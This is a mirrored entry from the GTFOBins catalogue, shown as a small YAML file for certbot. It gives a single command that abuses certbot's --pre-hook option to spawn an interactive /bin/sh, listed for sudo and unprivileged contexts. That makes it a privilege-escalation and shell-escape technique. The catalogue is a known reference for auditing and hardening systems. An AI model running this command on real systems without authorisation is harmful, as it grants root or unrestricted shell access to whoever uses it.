1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/certbot
2026-01-06 17:52:30 +01:00

12 lines
313 B
Plaintext

---
functions:
shell:
- code: |-
certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'
comment: |-
This needs a writable directory, replace `.` if needed.
contexts:
sudo:
unprivileged:
...